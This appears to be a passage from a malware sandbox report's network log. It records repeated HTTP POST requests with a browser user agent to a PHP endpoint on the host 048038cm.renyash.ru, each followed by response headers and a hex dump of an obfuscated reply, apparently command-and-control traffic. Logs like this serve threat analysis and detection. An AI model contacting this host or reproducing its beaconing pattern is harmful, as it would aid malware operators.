                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0c 28 1a 2a 5a 23 3b 0a 1e 27 05 26 59 3d 13 35 5a 3e 09 2f 0a 29 06 11 54 27 38 05 02 3c 38 0f 19 24 11 0b 0d 21 04 27 0c 28 2a 21 46 04 1e 22 00 20 10 34 12 2a 23 25 56 3e 2c 20 16 21 30 17 14 26 3a 25 51 32 06 2b 52 22 12 2b 1d 24 3c 20 0e 3b 0a 00 5c 2e 20 21 10 26 14 2c 5e 0e 12 39 53 25 56 36 00 28 38 29 5d 27 20 33 50 26 2b 0b 5a 26 3b 01 55 23 38 21 58 3c 0e 37 55 30 01 2c 54 2d 15 0a 07 24 39 30 55 2b 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (*Z#;'&Y=5Z>/)T'8<8$!'(*!F" 4*#%V>, !0&:%Q2+R"+$< ;\. !&,^9S%V6(8)]' 3P&+Z&;U#8!X<7U0,T-$90U+2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:30.460010052 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:30.792371988 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:31.328547955 CET970INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:31 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRvJzc9inpIVtBjjKfDcdA%2FfIkTBo%2B44zEwmyS7i2TrPtGWENEt83Jb0ks2I1HUS0LpRBbzufLr1%2BZpsvBX%2B6P03F%2F3fZFlXDxJuIyhejtiYDDiEYsBmuh0DcrhQf8HV2yEsDS2S"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a2879f442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12792&min_rtt=1677&rtt_var=10898&sent=442&recv=552&lost=0&retrans=0&sent_bytes=63544&recv_bytes=373132&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1d 2a 27 31 06 20 02 34 56 24 12 2a 5f 2a 3e 35 5a 29 1e 33 08 29 28 28 0e 32 01 24 10 2b 28 35 18 27 3f 0b 0d 21 03 0d 0d 28 00 21 46 04 1e 21 5c 21 2d 3c 10 28 20 3d 55 3d 12 27 05 21 56 3e 04 27 29 21 50 26 16 0d 1f 35 2f 30 09 30 05 27 53 3b 42 36 17 3a 09 3e 0a 31 2e 2c 5e 0e 12 3a 0a 25 30 18 00 3f 38 17 5c 33 33 3b 50 32 38 3d 11 33 3b 38 09 37 01 2d 5f 3f 1e 27 53 33 2c 20 56 3a 05 0d 5e 27 5f 2c 56 29 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#*'1 4V$*_*>5Z)3)((2$+(5'?!(!F!\!-<( =U='!V>')!P&5/00'S;B6:>1.,^:%0?8\33;P28=3;87-_?'S3, V:^'_,V)"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:31.329832077 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:31.662265062 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:32.191565037 CET975INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7cN5wj%2FW8%2FpvFJUldXSo8CGDObYJrC2sCCxlKsBy714%2FvlFuSNFVFnBSAxuzOu8xH%2Fag%2B%2F%2F0b%2Fr1okauMYi3GVfW8275NY7P9TwZgbPq3HqLutt63k85lnJe11GKYGJ0VfkFfuq"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a2def5342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11635&min_rtt=1677&rtt_var=8603&sent=448&recv=557&lost=0&retrans=0&sent_bytes=64539&recv_bytes=375538&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3c 0a 22 58 23 3b 0a 54 24 2c 31 07 29 03 2a 03 3e 30 23 40 29 2b 3b 12 31 38 28 12 3f 38 3e 07 30 2f 2e 1c 21 3d 2c 52 3c 10 21 46 04 1e 21 59 34 00 20 10 28 23 2d 54 2b 2f 3c 5b 22 0e 25 5f 27 3a 0c 09 27 38 3b 1f 21 3c 3b 51 24 12 3f 56 2c 42 32 14 2f 23 21 1e 31 2e 2c 5e 0e 12 3a 0e 26 23 21 5b 29 38 14 02 27 0e 19 1c 25 05 0b 5a 26 2b 2b 56 37 01 2d 14 3c 33 3f 1f 30 06 34 1f 39 2b 27 1b 24 39 02 55 3e 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S<"X#;T$,1)*>0#@)+;18(?8>0/.!=,R<!F!Y4 (#-T+/<["%_':'8;!<;Q$?V,B2/#!1.,^:&#![)8'%Z&++V7-<3?049+'$9U>2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:32.194210052 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:32.732673883 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:32.874682903 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:33.077462912 CET974INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vu%2BLU%2BTIA6EvDelANWSUlrSIJ41rzyhHJs5UoL%2FRyH7PMr89uNL7Ww8sOuV4Kt70Z8Ro573BPZ%2F1mUPAPmxvhnSj%2F0zXio666Q4cn5h%2BzaEKJ09uYGHCJzVsQaC5actZ%2FQp2SRM0"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a334d7f42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=14008&min_rtt=1677&rtt_var=13690&sent=454&recv=562&lost=0&retrans=0&sent_bytes=65539&recv_bytes=377944&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 2b 0a 31 03 37 15 05 0a 27 05 3a 15 2b 2d 35 58 3e 30 02 18 3d 3b 37 1c 26 06 2f 07 28 38 25 1a 25 3c 3a 54 20 2d 02 55 28 10 21 46 04 1e 22 01 34 00 2f 00 29 0a 2d 54 2a 02 01 02 22 20 3d 14 33 39 3e 0b 25 38 3b 57 22 12 06 0e 27 3c 23 57 38 34 0c 5a 39 56 25 53 32 3e 2c 5e 0e 12 39 53 25 23 22 02 3f 06 13 1f 24 30 27 1d 26 3b 31 5b 26 3b 3c 08 23 28 3d 1b 2b 20 1e 0b 26 2c 27 0b 39 3b 37 59 27 2a 2c 50 2b 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#+17':+-5X>0=;7&/(8%%<:T -U(!F"4/)-T*" =39>%8;W"'<#W84Z9V%S2>,^9S%#"?$0'&;1[&;<#(=+ &,'9;7Y'*,P+2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:33.080450058 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:33.412977934 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:33.941068888 CET962INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5sdZljpdCfOx1WcoQGna0rOcbr0vciu6n6Sb9VnleJpQCRiuEhwoUj5yg8SAYW54U8LCQZJFVPKQqvrcmsODPZAZP1LnIgTwltjfSIL5zsdQwIXD1Xheg6FFYczcF2YLhXI0%2BD3"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a38dc6742cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12470&min_rtt=1677&rtt_var=10012&sent=460&recv=567&lost=0&retrans=0&sent_bytes=66538&recv_bytes=380350&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 53 3c 27 2e 1d 21 28 38 52 24 3c 32 5c 2b 2e 36 03 29 1e 05 08 29 38 1a 0c 31 16 20 1d 3c 16 22 09 27 2c 39 0f 36 5b 30 57 3f 00 21 46 04 1e 21 5a 21 2e 24 59 3d 0d 36 0f 3e 2f 20 5c 36 0e 35 15 27 2a 39 57 26 28 01 10 36 12 33 55 24 12 3b 57 2f 1d 2e 5b 2e 30 3d 55 24 3e 2c 5e 0e 12 3a 08 32 33 25 5a 2b 5e 29 12 26 20 15 12 31 15 29 59 27 2b 0d 54 34 3b 21 14 3f 0e 24 0e 33 3c 20 56 2d 2b 2f 59 24 29 24 57 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#S<'.!(8R$<2\+.6))81 <"',96[0W?!F!Z!.$Y=6>/ \65'*9W&(63U$;W/.[.0=U$>,^:23%Z+^)& 1)Y'+T4;!?$3< V-+/Y$)$W="!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:33.949125051 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:34.281681061 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:34.820050955 CET961INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymelxp6sLO1GvjbDVcEbaN3foH3l68Vplx5zJEKD41ggemSIHYG7e2aEbqmEeR65rmQiJHrFAx4M%2BMjCMekPSKjQzWWow5pBtlXF1gk4ownyLE2FU0GgSNOXqY9WQjI8IzcnfycG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a3e4a1442cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12089&min_rtt=1677&rtt_var=9432&sent=466&recv=572&lost=0&retrans=0&sent_bytes=67525&recv_bytes=382756&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 55 3f 1a 08 5f 23 28 27 0a 30 02 2e 15 3e 2d 25 58 2a 0e 2b 42 2a 3b 3b 55 25 28 24 1d 3c 5e 29 1d 24 01 22 13 35 2e 37 0e 2b 3a 21 46 04 1e 22 03 20 58 28 59 2a 0a 3d 56 3d 5a 38 5d 22 0e 3a 07 30 5c 2d 51 32 06 23 1f 36 02 2f 56 30 3f 33 1a 2d 24 03 05 3a 20 0f 1e 26 04 2c 5e 0e 12 3a 0b 32 1e 32 05 3f 06 13 5a 30 56 3b 12 25 38 21 12 27 15 38 0c 37 01 3d 5d 3f 1e 3b 53 33 01 20 53 2d 02 2b 58 24 39 09 0c 2a 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#U?_#('0.>-%X*+B*;;U%($<^)$"5.7+:!F" X(Y*=V=Z8]":0\-Q2#6/V0?3-$: &,^:22?Z0V;%8!'87=]?;S3 S-+X$9*"!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:34.822065115 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:35.154851913 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:35.638271093 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RsG8Zbb%2FvWR7SmAoOpxM3sULcZbs9A2EDwFt1RJxOTPnKREjLOW0C0%2F27ma2p4GpAZf0zHCWS%2B713WB8GHc6kWNyc9SE8PjmoQsuYD0msbcGwh1EwK0RRv2%2FtL%2FH1P8tyVg2xdRD"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a43b86842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=12060&min_rtt=1677&rtt_var=9606&sent=471&recv=577&lost=0&retrans=0&sent_bytes=68511&recv_bytes=385162&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 28 34 31 06 37 5d 24 57 24 3c 29 05 2b 2e 22 01 28 30 37 44 29 38 20 0c 25 28 0e 12 28 38 0f 19 27 01 2a 1d 35 3d 2b 0f 3c 00 21 46 04 1e 21 5c 34 3e 34 5f 3d 30 35 54 3e 02 3c 5d 22 20 3a 07 24 2a 39 14 27 28 09 1f 22 2c 3c 0f 25 2c 09 51 2d 34 04 19 2e 23 22 0e 32 04 2c 5e 0e 12 39 50 25 30 25 12 3c 2b 25 5c 24 09 37 51 25 5d 25 1f 30 3b 3f 57 23 2b 26 00 2b 30 15 1f 33 01 2c 52 39 28 3f 16 33 29 01 0e 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#(417]$W$<)+."(07D)8 %((8'*5=+<!F!\4>4_=05T><]" :$*9'(",<%,Q-4.#"2,^9P%0%<+%\$7Q%]%0;?W#+&+03,R9(?3)*!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:35.641242027 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:35.973993063 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:36.604887009 CET963INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CbTlHYB2joezmEc11gh38SRJ4I2sNmz%2FRwFKjIPA9gpROVRDc15WUxFl2vu7WUlUVEblf4oGDfQ5YRKTXsE%2Brg6H4CGBpQRs8npI2fSZREQg9gBwMP0K4jfEt8K9N8YuySw1PJwc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a48dee142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11219&min_rtt=1677&rtt_var=8101&sent=476&recv=583&lost=0&retrans=0&sent_bytes=69505&recv_bytes=387568&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 2a 37 2e 59 20 15 24 56 24 2f 3a 59 29 13 07 10 28 33 20 1a 2a 5e 28 08 25 2b 23 07 28 16 32 45 30 2c 25 0e 21 03 30 56 2b 2a 21 46 04 1e 22 05 20 10 02 12 3e 33 2d 1f 3d 12 02 17 35 0e 31 58 33 39 3d 51 31 38 33 1f 22 02 23 50 30 3c 20 09 2f 37 2a 5a 3a 30 25 53 32 14 2c 5e 0e 12 3a 09 32 0e 3a 03 28 01 3e 00 33 20 3f 56 25 05 31 5b 26 28 38 09 21 38 31 5d 2b 30 33 55 27 2f 27 0f 2d 05 06 01 33 39 2f 09 29 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 *7.Y $V$/:Y)(3 *^(%+#(2E0,%!0V+*!F" >3-=51X39=Q183"#P0< /7*Z:0%S2,^:2:(>3 ?V%1[&(8!81]+03U'/'-39/)!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:36.606076002 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:37.164074898 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:37.778947115 CET966INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1o0oaYo%2BzHDXJ1UphoMDqsV5qSAh04Obia3jTqBZDHCbLWfMiDgrqNBWjrPxAmKhN5rsdq9hDcvNLHeyTo%2BCtFDweNxccTgYoqYV6%2FBwxALAQ7gFLRkt7yoKrbwyAYTJxjZlQpte"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a4f8e8d42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=26317&min_rtt=1677&rtt_var=36271&sent=485&recv=591&lost=0&retrans=1&sent_bytes=70498&recv_bytes=389974&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 57 28 34 25 03 20 28 33 0e 24 2c 32 15 3e 3d 08 02 3d 0e 23 41 3e 06 2b 56 32 01 3f 00 2b 38 35 19 24 11 00 54 36 03 3b 0c 3c 10 21 46 04 1e 21 5a 20 07 37 06 3e 33 32 0b 2a 3f 2f 05 35 0e 13 1a 30 5c 26 09 31 5e 24 0d 21 05 30 0e 27 5a 3c 0e 2d 34 2d 07 2d 20 00 0c 25 3e 2c 5e 0e 12 3a 09 31 20 25 5d 28 28 31 59 26 33 28 0e 32 2b 0b 58 26 38 3f 1e 21 28 2a 04 28 56 3c 0d 27 3f 05 0c 2d 3b 05 1b 27 2a 3f 08 3d 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#W(4% (3$,2>==#A>+V2?+85$T6;<!F!Z 7>32*?/50\&1^$!0'Z<-4-- %>,^:1 %]((1Y&3(2+X&8?!(*(V<'?-;'*?="!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:37.779742002 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2060
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:38.237289906 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:38.680568933 CET961INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:38 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FFEYBAsG2xNN5CkaZhoxv%2F3A12UJeIzU6TXIN2gBD%2BKTOnFXfP4QCB2Rjiv02uKogEXAnWL9P74nxHjW6YRrDVqNAxAuIlHI9dHUCmv7OuZdZ81yFvC%2BZgASpqYFWkyk37GMRqHk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a569e4142cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=32936&min_rtt=1677&rtt_var=40442&sent=492&recv=597&lost=0&retrans=2&sent_bytes=71494&recv_bytes=392340&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1d 2b 42 2e 5b 23 38 28 1e 30 02 2e 1b 3e 03 0f 5d 2a 1e 01 43 2a 06 3c 09 32 3b 3c 58 3f 38 36 08 33 59 25 0d 35 3e 34 53 2a 2a 21 46 04 1e 21 13 37 3d 30 13 2a 23 08 0a 2a 02 02 16 36 33 26 01 30 5c 22 0a 32 06 2f 1e 36 3c 27 1e 27 2f 2c 0b 3b 24 29 03 39 30 3a 0b 25 04 2c 5e 0e 12 3a 0a 26 0e 1b 59 2b 3b 26 03 26 30 3c 0c 26 02 3e 03 27 38 30 09 37 38 22 01 3f 33 28 0d 33 01 2f 0b 2c 3b 23 15 26 29 02 57 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a
                                                                        Data Ascii: 98#+B.[#8(0.>]*C*<2;<X?863Y%5>4S**!F!7=0*#*63&0\"2/6<''/,;$)90:%,^:&Y+;&&0<&>'8078"?3(3/,;#&)W*!^/,Q4TV
                                                                        Dec 28, 2024 20:43:38.933804035 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:39.394028902 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:40.086711884 CET970INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f8%2FC0GaTqJ3WxQjdoJfzWbqTH5bxKaMnBeiPPl646%2BrhWXqoA371%2BOOlRl2K9mCvUiUl9BUjBa0jGIr2xMB9H8XyqWOxW8Nd7Tij4L6cvTSywooY6Cobma19AV6ZxJo%2FTny33d%2Fe"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a5dcf2e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=35945&min_rtt=1677&rtt_var=41669&sent=498&recv=602&lost=0&retrans=2&sent_bytes=72485&recv_bytes=394746&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0b 3f 34 2e 1d 37 5d 38 57 33 2f 21 07 2b 2d 04 04 3e 33 23 44 2a 28 37 50 31 06 30 5b 2b 38 03 1d 25 3c 25 0e 22 2d 20 55 28 00 21 46 04 1e 21 58 20 58 2c 58 29 0a 21 53 3e 02 3b 04 35 33 25 5c 26 3a 26 0a 31 38 3f 1d 22 3f 2f 54 33 3c 3c 08 2f 24 2d 06 39 30 0b 54 32 14 2c 5e 0e 12 3a 08 26 23 3a 01 3f 06 21 1f 33 09 2b 55 27 3b 2d 5b 30 3b 09 56 34 01 2e 04 28 33 2b 1d 30 11 3c 53 2e 2b 05 15 27 00 33 08 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ?4.7]8W3/!+->3#D*(7P10[+8%<%"- U(!F!X X,X)!S>;53%\&:&18?"?/T3<</$-90T2,^:&#:?!3+U';-[0;V4.(3+0<S.+'3)2!^/,Q4TV0
                                                                        Dec 28, 2024 20:43:40.091928005 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2088
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:40.427592039 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:40.956479073 CET966INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
